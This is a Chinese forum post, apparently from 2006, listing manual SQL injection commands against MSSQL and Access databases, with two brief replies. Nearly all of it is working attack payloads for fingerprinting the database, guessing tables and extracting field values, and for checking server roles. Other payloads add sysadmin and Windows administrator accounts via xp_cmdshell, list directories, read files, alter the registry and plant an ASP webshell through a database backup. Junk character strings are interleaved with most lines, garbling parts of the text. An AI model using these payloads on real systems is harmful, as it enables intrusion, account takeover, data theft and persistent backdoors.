社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4329阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ,ZGU\t  
  2.初步判断是否是mssql ;and user>0 f~Y;ZvB  
i(T[  
  3.注入参数是字符'and [查询条件] and ''=' `-t8ag 3  
OT 0%p)  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' )5T82=[h<  
wcH,!;3z+  
  5.判断数据库系统 }uZ/^_U.  
aeZ$Wu>]W  
  ;and (select count(*) from sysobjects)>0 mssql pwvzs`[;  
1WjNFi  
  ;and (select count(*) from msysobjects)>0 access @k=UB&?I  
0JFS%Yjw[  
&!P' M  
X*cDn.(I  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 &Va="HNKt  
E{;F4wT_@  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 v[;R(pt?  
{p\ll  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 e"oTlB  
}1fi#  
  9.(1)猜字段的ascii值(access) .RNY}bbk  
;w/@_!~  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 >?<S(  
Tp46K\}Uf  
  (2)猜字段的ascii值(mssql) T@wgWE<0y_  
5{/uHscwLa  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 'oKen!?A  
Q XSS  
  10.测试权限结构(mssql) |I[/Fl:  
a\m_Q{:  
n6AA%? 5  
BG|m5f  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- :FTx#cZ  
XHU\;TF  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Qy ghNImp  
(}g4}A@x  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- b5Q|$E   
hrNB"W|?x  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- L4DT*(;!E  
f=k_U[b4>  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- xX f,j#`"  
.n n&K}h  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- F f{,zfN+3  
BLN|QaZ  
  ;and 1=(select IS_MEMBER('db_owner'));-- dGyrzuPJ  
D@2L<!\  
arIEd VfNa  
Gv[s86AP,  
  11.添加mssql和系统的帐户 1=Z!ZY}}e  
2&"qNpPtE  
  ;exec master.dbo.sp_addlogin username;-- 7}:+Yx  
  ;exec master.dbo.sp_password null,username,password;-- y'aK92pF:  
cX!C/`ew>  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- q9 :g  
+GJPj(S  
  ;exec master.dbo.xp_cmdshell 'net user username password /#WvC;B  
V7b;qC'  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Q,K$)bM  
=t^jlb  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- (xfh 9=.  
;FQNO:NP  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- NbC2N)L4  
KomMzG:  
@XJ#oxM^  
C}#$wge  
  12.(1)遍历目录 ~NZL~p  
;j.-6#n  
  ;create table dirs(paths varchar(100), id int) @9eN\b%I^H  
cYp/? \  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' zauDwV=  
yR? ./M!  
  ;and (select top 1 paths from dirs)>0 fy]c=:EmD  
h!@7'Q  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ollsB3]]  
T|8:_4/l  
@@j:z;^|  
iC3C~?,7  
  (2)遍历目录 |Fz ^(US  
[^Bjmw[7  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- QChncIqc  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Q 0G5<:wc  
+OqEe[Wk#  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ]#Cc7wa  
9: .m]QN  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 35Fxzj $  
42~.N =2  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 )X;051Q  
j+fib} 8}  
J5(0J7C  
G^N@ r:RS  
  13.mssql中的存储过程 4Q/{lqG  
l$1NI#&  
  xp_regenumvalues 注册表根键, 子键 m.p $f$A_  
/vq$/  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 dQ:F5|p  
DuNindo 8  
  xp_regread 根键,子键,键值名 `m#-J;la  
YA@MLZm  
  ;exec xp_regread c7~R0nP  
cnS;9=,&  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 8\"Gs z  
Y)DAR83  
  xp_regwrite 根键,子键, 值名, 值类型, 值 a2Nxpxho  
Unv'm5/L  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 L2+cVR  
AT)b/ycC  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 $|xSM2  
n\)1Bz  
  xp_regdeletevalue 根键,子键,值名 F~i ~%f,  
k_{?{:X;y  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 JO`r)_  
J$sBfO D  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ~+j2a3rv-{  
B2oKvgw  
'da 'WZG  
O!%T<2i3  
  14.mssql的backup创建webshell rf-yUH]&S  
}NoP(&ebz*  
  use model ,#FP]$FK  
gyD;kn\CP  
  create table cmd(str image); i(pHJP:a:  
2,dWD<h  
  insert into cmd(str) values (''); T\n6^@.>  
E_En"r)y  
  backup database model to disk='c:\l.asp'; S :8  
70GBf"  
'AX5V-t  
l 9 wO x  
  15.mssql内置函数 yhYF "~CM  
,[IDC3.4^R  
  ;and (select @@version)>0 获得Windows的版本号 FLs$  
Gc"hU:m  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa E(j# R"  
P woiX#vz  
  ;and (select user_name())>0 爆当前系统的连接用户  *<W8j[?  
S\h5 D2G;  
  ;and (select db_name())>0 得到当前连接的数据库 j{ YYG|  
I-Z|FKh_C  
vue^bn  
g\fj6  
  16.简洁的webshell \7i_2|w  
;<N:!$p  
  use model m)} 01N4  
tnaFbmp  
  create table cmd(str image); cLl~4jL  
u*v<dsGQ  
  insert into cmd(str) values (''); Bp_R"DS7A  
7]xDMu'^&f  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八